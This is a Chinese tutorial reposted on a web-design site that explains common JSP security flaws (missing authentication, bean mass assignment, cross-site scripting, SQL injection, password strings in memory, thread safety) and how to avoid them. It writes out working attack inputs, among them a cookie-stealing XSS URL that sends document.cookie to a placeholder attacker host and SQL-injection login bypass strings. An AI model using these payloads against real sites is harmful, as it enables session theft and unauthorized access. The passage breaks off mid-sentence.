最新更新 sitemap 网站制作设计本站搜索
网页设计
国外网站 韩国网站 个人主页 手提袋设计 CSS 网页特效 平面设计 网站设计 Flash CMS技巧 服装网站 php教程 photoshop 画册 服务器选用 数据库 Office
虚拟主机 域名注册 云主机 网页设计 客服QQ:8208442
当前位置:首页 > 编程开发 > jsp教程

JSP安全编程实例浅析

日期:07-19    来源:中国设计秀    作者:cnwebshow.com

java Server Page(jsp)作为建立动态网页的技术正在不断升温。JSP和asp、php、工作机制不太一样。一般说来,JSP页面在执行时是编译式,而不是解释式的。首次调用JSP文件其实是执行一个编译为Servlet的过程。当浏览器向服务器请求这一个JSP文件的时候,服务器将检查自上次编译后JSP文件是否有改变,如果没有改变,就直接执行Servlet,而不用再重新编译,这样,效率便得到了明显提高。qSc中国设计秀

  今天我将和大家一起从脚本编程的角度看JSP的安全,那些诸如源码暴露类的安全隐患就不在这篇文章讨论范围之内了。写这篇文章的主要目的是给初学JSP编程的朋友们提个醒,从一开始就要培养安全编程的意识,不要犯不该犯的错误,避免可以避免的损失。另外,我也是初学者,如有错误或其它意见请发帖赐教。qSc中国设计秀

  一、认证不严——低级失误qSc中国设计秀

  在溢洋论坛v1.12 修正版中,qSc中国设计秀

  user_manager.jsp是用户管理的页面,作者知道它的敏感性,加上了一把锁:qSc中国设计秀

if ((session.getValue("UserName")==null)││(session.getValue("UserClass")==null)││(! session.getValue("UserClass").equals("系统管理员"))) qSc中国设计秀
{ qSc中国设计秀
 response.sendRedirect("err.jsp?id=14"); qSc中国设计秀
 return; qSc中国设计秀
qSc中国设计秀

  如果要查看、修改某用户的信息,就要用modifyuser_manager.jsp这个文件。管理员提交 qSc中国设计秀
http://www.somesite.com/yyforum/modifyuser_manager.jsp?modifyid=51 qSc中国设计秀
就是查看、修改ID为51的用户的资料(管理员默认的用户ID为51)。但是,如此重要的文件竟缺乏认证,普通用户(包括游客)也直接提交上述请求也可以对其一览无余(密码也是明文存储、显示的)。modifyuser_manage.jsp同样是门户大开,直到恶意用户把数据更新的操作执行完毕,重定向到user_manager.jsp的时候,他才会看见那个姗姗来迟的显示错误的页面。显然,只锁一扇门是远远不够的,编程的时候一定要不厌其烦地为每一个该加身份认证的地方加上身份认证。qSc中国设计秀

  二、守好JavaBean的入口qSc中国设计秀

  JSP组件技术的核心是被称为bean的java组件。在程序中可把逻辑控制、数据库操作放在javabeans组件中,然后在JSP文件中调用它,这样可增加程序的清晰度及程序的可重用性。和传统的ASP或PHP页面相比,JSP页面是非常简洁的,因为许多动态页面处理过程可以封装到JavaBean中。qSc中国设计秀

  要改变JavaBean属性,要用到“<jsp:setPRoperty>”标记。qSc中国设计秀

  下面的代码是假想的某电子购物系统的源码的一部分,这个文件是用来显示用户的购物框中的信息的,而checkout.jsp是用来结帐的。qSc中国设计秀

<jsp:useBean id="myBasket" class="BasketBean"> qSc中国设计秀
<jsp:setProperty name="myBasket" property="*"/> qSc中国设计秀
<jsp:useBean> qSc中国设计秀
<html> qSc中国设计秀
<head><title>Your Basket</title></head> qSc中国设计秀
<body> qSc中国设计秀
<p> qSc中国设计秀
You have added the item qSc中国设计秀
<jsp::getProperty name="myBasket" property="newItem"/> qSc中国设计秀
to your basket. qSc中国设计秀
<br/> qSc中国设计秀
Your total is $ qSc中国设计秀
<jsp::getProperty name="myBasket" property="balance"/> qSc中国设计秀
Proceed to <a href="checkout.jsp">checkout</a>qSc中国设计秀

  注意到property="*"了吗?这表明用户在可见的JSP页面中输入的,或是直接通过Query String提交的全部变量的值,将存储到匹配的bean属性中。qSc中国设计秀

  一般,用户是这样提交请求的:qSc中国设计秀

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342 qSc中国设计秀

  但是不守规矩的用户呢?他们可能会提交:qSc中国设计秀

http://www.somesite.com /addToBasket.jsp?newItem=ITEM0105342&balance=0 qSc中国设计秀

qSc中国设计秀
  这样,balance=0的信息就被在存储到了JavaBean中了。当他们这时点击“chekout”结账的时候,费用就全免了。qSc中国设计秀

  这与PHP中全局变量导致的安全问题如出一辙。由此可见:“property="*"”一定要慎用!qSc中国设计秀
三、长盛不衰的跨站脚本qSc中国设计秀

  跨站脚本(Cross Site Scripting)攻击是指在远程WEB页面的HTML代码中手插入恶意的Javascript, VBScript, ActiveX, HTML, 或Flash等脚本,窃取浏览此页面的用户的隐私,改变用户的设置,破坏用户的数据。跨站脚本攻击在多数情况下不会对服务器和WEB程序的运行造成影响,但对客户端的安全构成严重的威胁。qSc中国设计秀

  以仿动网的阿菜论坛(beta-1)举个最简单的例子。当我们提交qSc中国设计秀

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>alert(document.cookie)</script> qSc中国设计秀

  便能弹出包含自己cookie信息的对话框。而提交qSc中国设计秀

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.163.com'</script> qSc中国设计秀

  就能重定向到网易。qSc中国设计秀

  由于在返回“name”变量的值给客户端时,脚本没有进行任何编码或过滤恶意代码,当用户访问嵌入恶意“name”变量数据链接时,会导致脚本代码在用户浏览器上执行,可能导致用户隐私泄露等后果。比如下面的链接:qSc中国设计秀

http://www.somesite.com/acjspbbs/dispuser.jsp?name=someuser<;script>document.location='http://www.hackersite.com/xxx.xxx?'+document.cookie</script> qSc中国设计秀

  xxx.xxx用于收集后边跟的参数,而这里参数指定的是document.cookie,也就是访问此链接的用户的cookie。在ASP世界中,很多人已经把偷cookie的技术练得炉火纯青了。在JSP里,读取cookie也不是难事。当然,跨站脚本从来就不会局限于偷cookie这一项功能,相信大家都有一定了解,这里就不展开了。qSc中国设计秀

  对所有动态页面的输入和输出都应进行编码,可以在很大程度上避免跨站脚本的攻击。遗憾的是,对所有不可信数据编码是资源密集型的工作,会对 Web 服务器产生性能方面的影响。常用的手段还是进行输入数据的过滤,比如下面的代码就把危险的字符进行替换:qSc中国设计秀

<% String message = request.getParameter("message"); qSc中国设计秀
message = message.replace ('<','_'); qSc中国设计秀
message = message.replace ('>','_'); qSc中国设计秀
message = message.replace ('"','_'); qSc中国设计秀
message = message.replace (''','_'); qSc中国设计秀
message = message.replace ('%','_');   [转自:51item.net]  qSc中国设计秀
message = message.replace (';','_'); qSc中国设计秀
message = message.replace ('(','_'); qSc中国设计秀
message = message.replace (')','_'); qSc中国设计秀
message = message.replace ('&','_'); qSc中国设计秀
message = message.replace ('+','_'); %> qSc中国设计秀

  更积极的方式是利用正则表达式只允许输入指定的字符:qSc中国设计秀

public boolean isValidInput(String str) qSc中国设计秀
{ qSc中国设计秀
 if(str.matches("[a-z0-9]+")) return true; qSc中国设计秀
 else return false; qSc中国设计秀
qSc中国设计秀

  四、时刻牢记SQL注入qSc中国设计秀

  一般的编程书籍在教初学者的时候都不注意让他们从入门时就培养安全编程的习惯。著名的《JSP编程思想与实践》就是这样向初学者示范编写带数据库的登录系统的(数据库为MySQL):qSc中国设计秀

Statement stmt = conn.createStatement(); qSc中国设计秀
String checkUser = "select * from login where username = '" + userName + "' and userpassword = '" + userPassword + "'"; qSc中国设计秀
ResultSet rs = stmt.executeQuery(checkUser); qSc中国设计秀
if(rs.next()) qSc中国设计秀
 response.sendRedirect("SuccessLogin.jsp"); qSc中国设计秀
else qSc中国设计秀
 response.sendRedirect("FailureLogin.jsp"); qSc中国设计秀

  这样使得尽信书的人长期使用这样先天“带洞”的登录代码。如果数据库里存在一个名叫“jack”的用户,那么在不知道密码的情况下至少有下面几种方法可以登录:qSc中国设计秀

用户名:jack qSc中国设计秀
密码:' or 'a'='a qSc中国设计秀
用户名:jack qSc中国设计秀
密码:' or 1=1/* qSc中国设计秀
用户名:jack' or 1=1/* qSc中国设计秀
密码:(任意) qSc中国设计秀
lybbs(凌云论坛)ver 2.9.Server在LogInOut.java中是这样对登录提交的数据进行检查的: qSc中国设计秀
if(s.equals("") ││ s1.equals("")) qSc中国设计秀
throw new UserException("用户名或密码不能空。"); qSc中国设计秀
if(s.indexOf("'") != -1 ││ s.indexOf(""") != -1 ││ s.indexOf(",") != -1 ││ s.indexOf("") != -1) qSc中国设计秀
throw new UserException("用户名不能包括 ' " , 等非法字符。"); qSc中国设计秀
if(s1.indexOf("'") != -1 ││ s1.indexOf(""") != -1 ││ s1.indexOf("*") != -1 ││ s1.indexOf("") != -1) qSc中国设计秀
throw new UserException("密码不能包括 ' " * 等非法字符。"); qSc中国设计秀
if(s.startsWith(" ") ││ s1.startsWith(" ")) qSc中国设计秀
throw new UserException("用户名或密码中不能用空格。"); qSc中国设计秀

  但是我不清楚为什么他只对密码而不对用户名过滤星号。另外,正斜杠似乎也应该被列到“黑名单”中。我还是认为用正则表达式只允许输入指定范围内的字符来得干脆。qSc中国设计秀

  这里要提醒一句:不要以为可以凭借某些数据库系统天生的“安全性”就可以有效地抵御所有的攻击。pinkeyes的那篇《PHP注入实例》就给那些依赖PHP的配置文件中的“magic_quotes_gpc = On”的人上了一课。qSc中国设计秀

  五、String对象带来的隐患qSc中国设计秀

  Java平台的确使安全编程更加方便了。Java中无指针,这意味着 Java 程序不再像C那样能对地址空间中的任意内存位置寻址了。在JSP文件被编译成 .class 文件时会被检查安全性问题,例如当访问超出数组大小的数组元素的尝试将被拒绝,这在很大程度上避免了缓冲区溢出攻击。但是,String对象却会给我们带来一些安全上的隐患。如果密码是存储在 Java String 对象中的,则直到对它进行垃圾收集或进程终止之前,密码会一直驻留在内存中。即使进行了垃圾收集,它仍会存在于空闲内存堆中,直到重用该内存空间为止。密码 String 在内存中驻留得越久,遭到窃听的危险性就越大。更糟的是,如果实际内存减少,则操作系统会将这个密码 String 换页调度到磁盘的交换空间,因此容易遭受磁盘块窃听攻击。为了将这种泄密的可能性降至最低(但不是消除),您应该将密码存储在 char 数组中,并在使用后对其置零(String 是不可变的,无法对其置零)。qSc中国设计秀

  六、线程安全初探qSc中国设计秀

  “JAVA能做的,JSP就能做”。与ASP、PHP等脚本语言不一样,JSP默认是以多线程方式执行的。以多线程方式执行可大大降低对系统的资源需求,提高系统的并发量及响应时间。线程在程序中是独立的、并发的执行路径,每个线程有它自己的堆栈、自己的程序计数器和自己的局部变量。虽然多线程应用程序中的大多数操作都可以并行进行,但也有某些操作(如更新全局标志或处理共享文件)不能并行进行。如果没做好线程的同步,在大并发量访问时,不需要恶意用户的“热心参与”,问题也会出现。最简单的解决方案就是在相关的JSP文件中加上: <%@ page isThreadSafe="false" %>指令,使它以单线程方式执行,这时,所有客户端的请求以串行方式执行。这样会严重降低系统的性能。我们可以仍让JSP文件以多线程方式执行,通过对函数上锁来对线程进行同步。一个函数加上synchronized 关键字就获得了一个锁。看下面的示例:qSc中国设计秀

public class MyClass{ qSc中国设计秀
int a; qSc中国设计秀
public Init() {//此方法可以多个线程同时调用 qSc中国设计秀
 a = 0; qSc中国设计秀
} qSc中国设计秀
public synchronized void Set() {//两个线程不能同时调用此方法 qSc中国设计秀
 if(a>5) { qSc中国设计秀
  a= a-5; qSc中国设计秀
 } qSc中国设计秀
} qSc中国设计秀
qSc中国设计秀

  但是这样仍然会对系统的性能有一定影响。一个更好的方案是采用局部变量代替实例变量。因为实例变量是在堆中分配的,被属于该实例的所有线程共享,不是线程安全的,而局部变量在堆栈中分配,因为每个线程都有它自己的堆栈空间,所以这样线程就是安全的了。比如凌云论坛中添加好友的代码:qSc中国设计秀

public void addFriend(int i, String s, String s1) qSc中国设计秀
throws DBConnectException qSc中国设计秀
{ qSc中国设计秀
 try qSc中国设计秀
 { qSc中国设计秀
  if…… qSc中国设计秀
  else qSc中国设计秀
  { qSc中国设计秀
   DBConnect dbconnect = new DBConnect("insert into friend (authorid,friendname) values (?,?)"); qSc中国设计秀
   dbconnect.setInt(1, i); qSc中国设计秀
   dbconnect.setString(2, s); qSc中国设计秀
   dbconnect.executeUpdate(); qSc中国设计秀
   dbconnect.close(); qSc中国设计秀
   dbconnect = null; qSc中国设计秀
  } qSc中国设计秀
 } qSc中国设计秀
 catch(Exception exception) qSc中国设计秀
 { qSc中国设计秀
  throw new DBConnectException(exception.getMessage()); qSc中国设计秀
 } qSc中国设计秀
qSc中国设计秀

  下面是调用:qSc中国设计秀

friendName=ParameterUtils.getString(request,"friendname"); qSc中国设计秀
if(action.equals("adduser")) { qSc中国设计秀
 forumFriend.addFriend(Integer.parseInt(cookieID),friendName,cookieName); qSc中国设计秀
 errorInfo=forumFriend.getErrorInfo(); qSc中国设计秀
qSc中国设计秀

  如果采用的是实例变量,那么该实例变量属于该实例的所有线程共享,

本文引用地址:/bc/article_46622.html
网站地图 | 关于我们 | 联系我们 | 网站建设 | 广告服务 | 版权声明 | 免责声明